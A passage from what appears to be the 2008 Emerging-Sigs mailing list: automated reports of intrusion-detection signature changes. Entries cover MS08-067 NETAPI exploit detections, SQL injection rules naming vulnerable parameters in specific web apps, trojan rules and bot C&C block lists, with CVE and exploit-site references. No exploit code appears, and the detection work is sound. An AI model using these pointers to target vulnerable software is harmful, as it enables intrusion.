url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008691 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008692 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008693 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008694 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008695 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008696 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008697 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008698 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008699 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008700 || ET EXPLOIT Microsoft 
Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008701 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008702 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008703 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008704 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008705 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008706 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008707 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008708 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008709 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || 
url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008710 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008711 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008712 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008713 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008714 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008715 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008716 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008717 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008718 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008719 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 
(29) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008720 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008721 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008722 || ET WEB_SPECIFIC Simple Customer contact.php SQL injection || bugtraq,28852 2008723 || ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection || bugtraq,31854 || url,www.milw0rm.com/exploits/6799 2008724 || ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection || bugtraq,31852 2008725 || ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection || url,secunia.com/advisories/32336 || url,milw0rm.com/exploits/6777 2008726 || ET TROJAN Gimmiv Infection Ping Outbound 2008727 || ET TROJAN Gimmiv Infection Ping Inbound 2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso -> Added to emerging-virus.rules (1): #by michael sconzo [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (1): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz -> Removed from emerging-sid-msg.map.txt (1): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz From emerging at emergingthreats.net Sat Oct 25 16:00:08 2008 From: emerging at emergingthreats.net 
(emerging@emergingthreats.net) Date: Sat, 25 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081025200008.77F8745026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 25 16:00:08 2008 [***] [+++] Added rules: [+++] 2008728 - ET TROJAN General Downloader URL - Post Infection (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (3): 2008728 || ET TROJAN General Downloader URL - Post Infection 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Added to emerging-sid-msg.map.txt (3): 2008728 || ET TROJAN General Downloader URL - Post Infection 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Oct 25 18:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 25 Oct 2008 18:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20081025220008.F003345026@goliath.jonkmans.com> [***] Results from 
Oinkmaster started Sat Oct 25 18:00:08 2008 [***] [+++] Added rules: [+++] 2008678 - ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods (emerging-exploit.rules) 2008679 - ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) (emerging-web_sql_injection.rules) 2008680 - ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) (emerging-web_sql_injection.rules) 2008681 - ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php (emerging-malware.rules) 2008682 - ET TROJAN Trojan.Zonebac.D (emerging-virus.rules) 2008683 - ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow (emerging-exploit.rules) 2008684 - ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection (emerging-web_sql_injection.rules) 2008685 - ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection (emerging-web_sql_injection.rules) 2008686 - ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection (emerging-web_sql_injection.rules) 2008687 - ET WEB PassWiki site_id Parameter Local File Inclusion (emerging-web.rules) 2008688 - ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection (emerging-web_sql_injection.rules) 2008689 - ET TROJAN Gimmiv.A.dll Infection (emerging-virus.rules) 2008690 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) (emerging-exploit.rules) 2008691 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) (emerging-exploit.rules) 2008692 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) (emerging-exploit.rules) 2008693 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) (emerging-exploit.rules) 2008694 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) (emerging-exploit.rules) 2008695 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) (emerging-exploit.rules) 2008696 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - 
MS08-067 (7) (emerging-exploit.rules) 2008697 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) (emerging-exploit.rules) 2008698 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) (emerging-exploit.rules) 2008699 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) (emerging-exploit.rules) 2008700 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (emerging-exploit.rules) 2008701 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) (emerging-exploit.rules) 2008702 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) (emerging-exploit.rules) 2008703 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) (emerging-exploit.rules) 2008704 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) (emerging-exploit.rules) 2008705 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) (emerging-exploit.rules) 2008706 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) (emerging-exploit.rules) 2008707 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) (emerging-exploit.rules) 2008708 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) (emerging-exploit.rules) 2008709 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) (emerging-exploit.rules) 2008710 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) (emerging-exploit.rules) 2008711 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) (emerging-exploit.rules) 2008712 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) (emerging-exploit.rules) 2008713 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) (emerging-exploit.rules) 2008714 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - 
MS08-067 (24) (emerging-exploit.rules) 2008715 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) (emerging-exploit.rules) 2008716 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) (emerging-exploit.rules) 2008717 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) (emerging-exploit.rules) 2008718 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) (emerging-exploit.rules) 2008719 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) (emerging-exploit.rules) 2008720 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) (emerging-exploit.rules) 2008721 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) (emerging-exploit.rules) 2008722 - ET WEB_SPECIFIC Simple Customer contact.php SQL injection (emerging-web_sql_injection.rules) 2008723 - ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection (emerging-web_sql_injection.rules) 2008724 - ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection (emerging-web_sql_injection.rules) 2008725 - ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection (emerging-web_sql_injection.rules) 2008726 - ET TROJAN Gimmiv Infection Ping Outbound (emerging-virus.rules) 2008727 - ET TROJAN Gimmiv Infection Ping Inbound (emerging-virus.rules) 2008728 - ET TROJAN General Downloader URL - Post Infection (emerging-virus.rules) 2400008 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2401008 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules) 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) [///] Modified active rules: [///] 2008391 - ET MALWARE Suspicious User-Agent (svchost) (emerging-malware.rules) 2008668 - ET 
WEB_SPECIFIC myEvent viewevent.php SQL Injection (emerging-web_sql_injection.rules) 2008669 - ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection (emerging-web_sql_injection.rules) 2008670 - ET WEB_SPECIFIC SweetCMS page SQL Injection (emerging-web_sql_injection.rules) 2008672 - ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection (emerging-web_sql_injection.rules) 2008673 - ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack (emerging-exploit.rules) 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP 
Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot 
C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-drop-BLOCK.rules (2): # VERSION 1338 # Generated 2008-10-25 00:03:02 EDT -> Added to emerging-drop.rules (2): # VERSION 1338 # Generated 2008-10-25 00:03:02 EDT -> Added to emerging-exploit.rules (2): #by stillsecure #by Secureworks -> Added to emerging-malware.rules (1): #by Deapesh Misra -> Added to 
emerging-sid-msg.map (55): 2008678 || ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods || url,secunia.com/Advisories/32337/ 2008679 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008680 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || url,www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008682 || ET TROJAN Trojan.Zonebac.D 2008683 || ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow || url,www.milw0rm.com/exploits/6793 || bugtraq,31814 2008684 || ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection || bugtraq,30692 2008685 || ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection || url,www.milw0rm.com/exploits/6792 || url,www.secunia.com/advisories/32321 2008686 || ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection || url,milw0rm.com/exploits/6780 || url,secunia.com/Advisories/32333/ 2008687 || ET WEB PassWiki site_id Parameter Local File Inclusion || bugtraq,29455 2008688 || ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection || url,www.milw0rm.com/exploits/6795 || url,secunia.com/advisories/32347/ 2008689 || ET TROJAN Gimmiv.A.dll Infection || url,www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A 2008690 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008691 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008692 || ET EXPLOIT 
Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008693 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008694 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008695 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008696 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008697 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008698 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008699 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008700 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008701 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || 
url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008702 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008703 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008704 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008705 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008706 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008707 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008708 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008709 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || 